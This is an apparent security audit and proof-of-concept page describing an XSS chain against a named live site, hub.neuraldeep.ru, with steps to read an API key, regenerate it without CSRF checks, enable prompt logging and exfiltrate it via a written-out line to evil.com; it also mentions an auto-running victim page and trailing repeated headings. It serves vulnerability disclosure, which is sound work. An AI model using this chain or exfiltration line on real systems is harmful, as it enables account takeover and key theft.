Neuraldeep Hub — Security Audit

XSS → Steal Key → Regenerate → Exfiltrate

1 Attacker injects XSS payload via username, log body, or innerHTML

2 Victim loads page → XSS fires (no CSP header — unrestricted JS)

3 XSS calls fetch('/api/me') → API key returned in plaintext JSON

4 XSS calls POST /api/me/key/regenerate → no CSRF token, no re-auth

5 XSS calls POST /api/me/privacy → silently enables prompt logging

6 XSS exfiltrates: new Image().src='https://evil.com?key='+stolenKey

⚠ All steps are same-origin — no CSRF tokens needed. CSP would block step 6, but there is no CSP.

Why This Works (confirmed on live hub.neuraldeep.ru)

❌ No Content-Security-Policy — XSS runs with full privileges

❌ API key in plaintext in /api/me JSON response every page load

❌ No CSRF tokens on /api/me/key/regenerate, /api/me/privacy, /api/auth/logout

❌ No re-authentication for key regeneration — only window.confirm()

❌ No session rotation after sensitive operations

❌ is_admin flag in /api/me + /admin in robots.txt

❌ No rate limiting on internal hub API

✅ hub_session cookie is HttpOnly (good, but XSS can still fetch/CSRF via same-origin)

Reproduction

The /victim page simulates a user visiting the dashboard with an XSS payload already injected.
The page auto-executes the full attack chain and shows exfiltrated data on /loot.

Neuraldeep Hub — Security Vulnerability Report

Attack Chain (requires one XSS foothold)

XSS → Steal Key → Regenerate → Exfiltrate

Why This Works (confirmed on live hub.neuraldeep.ru)

Reproduction